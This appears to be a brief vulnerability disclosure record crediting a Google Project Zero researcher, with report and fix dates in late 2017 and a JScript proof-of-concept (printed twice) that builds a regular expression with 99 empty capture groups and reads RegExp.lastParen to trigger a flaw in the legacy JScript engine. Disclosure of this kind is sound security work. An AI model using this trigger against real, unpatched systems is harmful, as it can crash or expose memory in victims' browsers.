- Report: Oct 2017
- Fix: Dec 2017
- Credit: ifratric of Google Project Zero
<script language="Jscript.Encode">
function go() {
var r= new RegExp(Array(100).join('()'));
''.search(r);
alert(RegExp.lastParen);
}
go();
</script><script language="Jscript.Encode">
function go() {
var r= new RegExp(Array(100).join('()'));
''.search(r);
alert(RegExp.lastParen);
}
go();
</script>